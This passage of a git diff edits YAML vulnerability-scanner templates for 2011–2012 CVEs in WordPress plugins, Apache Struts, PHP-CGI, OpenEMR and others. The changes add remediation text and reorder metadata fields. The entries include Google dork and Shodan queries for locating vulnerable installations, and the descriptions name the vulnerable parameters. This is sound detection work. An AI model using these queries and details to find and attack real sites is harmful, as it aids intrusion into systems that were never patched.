info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.0022 - cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* epss-percentile: 0.59193 + cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/skysa-official/" vendor: skysa product: skysa_app_bar_integration_plugin + google-query: inurl:"/wp-content/plugins/skysa-official/" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index cb9d6abcd4..917c82bd28 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + remediation: | + Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ @@ -15,13 +17,13 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00326 - cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* epss-percentile: 0.67061 + cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" vendor: clickdesk product: clickdesk_live_support-live_chat_plugin + google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 9b0df76c73..42a43d48cf 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + remediation: | + Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: - https://www.exploit-db.com/exploits/36493 - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 @@ -18,8 +20,8 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.02747 - cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* epss-percentile: 0.8922 + cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: orchardproject diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 7e0cce6880..3e404ca69e 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + remediation: | + Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468 @@ -14,13 +16,13 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00432 - cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* epss-percentile: 0.71357 + cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" vendor: featurific_for_wordpress_project product: featurific-for-wordpress + google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 00a1e82825..6e96f6924b 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -5,21 +5,21 @@ info: author: pikpikcu severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. + remediation: Developers should immediately upgrade to at least Struts 2.3.18. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - http://www.exploit-db.com/exploits/18329 - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 - http://struts.apache.org/2.x/docs/s2-008.html - remediation: Developers should immediately upgrade to at least Struts 2.3.18. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo epss-score: 0.97059 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.99651 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index a54697a174..6a669559e5 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + remediation: | + Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 @@ -18,14 +20,14 @@ info: cve-id: CVE-2012-0394 cwe-id: CWE-94 epss-score: 0.953 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.99071 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Struts Problem Report" verified: true + max-request: 1 vendor: apache product: struts + shodan-query: html:"Struts Problem Report" tags: ognl,injection,edb,cve,cve2012,apache,struts variables: first: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 61bbd1076e..ec829749af 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + remediation: | + Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability. reference: - https://packetstormsecurity.com/files/108631/ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day @@ -17,13 +19,13 @@ info: cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.02262 - cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* epss-percentile: 0.88176 + cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/count-per-day" vendor: count_per_day_project product: count_per_day + google-query: inurl:"/wp-content/plugins/count-per-day" tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal http: diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 203a226d6b..0e2e728709 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-0901 - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt @@ -15,13 +17,13 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00216 - cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* epss-percentile: 0.58864 + cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" vendor: attenzione product: yousaytoo + google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss http: diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index ffaf75fc0c..b33ab3000b 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + remediation: | + Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/18435 - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 @@ -16,8 +18,8 @@ info: cve-id: CVE-2012-0981 cwe-id: CWE-22 epss-score: 0.05654 - cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* epss-percentile: 0.92327 + cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kybernetika diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index c35c81dd3b..44d840b3f6 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + remediation: | + Apply the latest security patches or upgrade to a newer version of OpenEMR. reference: - https://www.exploit-db.com/exploits/36650 - https://nvd.nist.gov/vuln/detail/CVE-2012-0991 @@ -16,8 +18,8 @@ info: cve-id: CVE-2012-0991 cwe-id: CWE-22 epss-score: 0.89208 - cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* epss-percentile: 0.98307 + cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openemr diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 10eafa9935..1134d23017 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36784 - https://nvd.nist.gov/vuln/detail/CVE-2012-0996 - https://www.htbridge.ch/advisory/HTB23071 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 epss-score: 0.01398 - cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* epss-percentile: 0.84741 + cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 vendor: 11in1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 022ce152a6..76416fd698 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36873 - https://nvd.nist.gov/vuln/detail/CVE-2012-1226 - http://www.vulnerability-lab.com/get_content.php?id=428 - http://www.exploit-db.com/exploits/18480 - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 epss-score: 0.10469 - cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* epss-percentile: 0.94257 + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 vendor: dolibarr diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 366fd1e660..8393c0b888 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -6,6 +6,8 @@ info: severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + remediation: | + Upgrade to a patched version of PHP or apply the necessary security patches. reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 @@ -18,8 +20,8 @@ info: cve-id: CVE-2012-1823 cwe-id: CWE-20 epss-score: 0.97494 - cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* epss-percentile: 0.99959 + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 79d88e86ef..ae574af284 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + remediation: | + Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 - https://web.archive.org/web/20151001133311/http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html @@ -16,13 +18,13 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00229 - cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* epss-percentile: 0.60385 + cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" vendor: timely product: all-in-one_event_calendar + google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" tags: cve,cve2012,wordpress,xss,wp-plugin http: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 87c3abcf98..750de02ed3 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + remediation: | + Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 - http://www.openwall.com/lists/oss-security/2012/05/15/12 @@ -17,8 +19,8 @@ info: cve-id: CVE-2012-2371 cwe-id: CWE-79 epss-score: 0.00857 - cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* epss-percentile: 0.80154 + cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mnt-tech diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 6075690e9f..68d545a05d 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -8,6 +8,8 @@ info: An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. + remediation: | + Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 @@ -20,8 +22,8 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.97048 - cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* epss-percentile: 0.99647 + cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index c83fe0b501..c62d9ecca4 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx + remediation: | + Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4032 - https://www.exploit-db.com/exploits/37488 @@ -18,13 +20,13 @@ info: cve-id: CVE-2012-4032 cwe-id: CWE-20 epss-score: 0.01204 - cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* epss-percentile: 0.83485 + cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"WebsitePanel" html:"login" vendor: websitepanel product: websitepanel + shodan-query: title:"WebsitePanel" html:"login" tags: packetstorm,cve,cve2012,redirect,websitepanel,authenticated http: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index c4e0b54e32..915797b17b 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. + remediation: | + Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html @@ -14,8 +16,8 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* epss-percentile: 0.5888 + cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mf_gig_calendar_project diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 71994d47c9..8a6ed1bde7 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + remediation: | + Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37129 - https://nvd.nist.gov/vuln/detail/CVE-2012-4253 @@ -17,8 +19,8 @@ info: cve-id: CVE-2012-4253 cwe-id: CWE-22 epss-score: 0.03411 - cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* epss-percentile: 0.9021 + cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mysqldumper diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 80b3342b2c..d3e8795149 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + remediation: | + Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 @@ -17,13 +19,13 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* epss-percentile: 0.62364 + cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" vendor: ppfeufer product: 2-click-social-media-buttons + google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm http: diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index f5def3fab2..783b071d71 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -17,8 +17,8 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.0023 - cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* epss-percentile: 0.60499 + cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: laurent_destailleur diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 76c094dcf5..f54715f549 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + remediation: | + Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt @@ -16,13 +18,13 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.00922 - cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* epss-percentile: 0.80933 + cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: mikejolley product: download_monitor + framework: wordpress tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress http: diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 8135e487dd..bdae8173e9 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. reference: - https://www.exploit-db.com/exploits/37034 - https://nvd.nist.gov/vuln/detail/CVE-2012-4878 @@ -17,8 +19,8 @@ info: cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.01193 - cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* epss-percentile: 0.83395 + cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: flatnux diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 4aed02c5fb..99d165329b 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + remediation: | + Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt @@ -16,8 +18,8 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.02518 - cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* epss-percentile: 0.88764 + cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: manageengine diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index ef6c9bd8c0..721f35973b 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server. reference: - https://www.exploit-db.com/exploits/37996 - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 @@ -15,8 +17,8 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.05321 - cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* epss-percentile: 0.92093 + cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gecad diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 7b31d4cacd..ce0a2a0c76 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + remediation: | + Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/38062 - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00748 - cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* epss-percentile: 0.78628 + cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 vendor: forescout diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 716bbd085d..dd0a23a854 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | tiki-featured_link.php 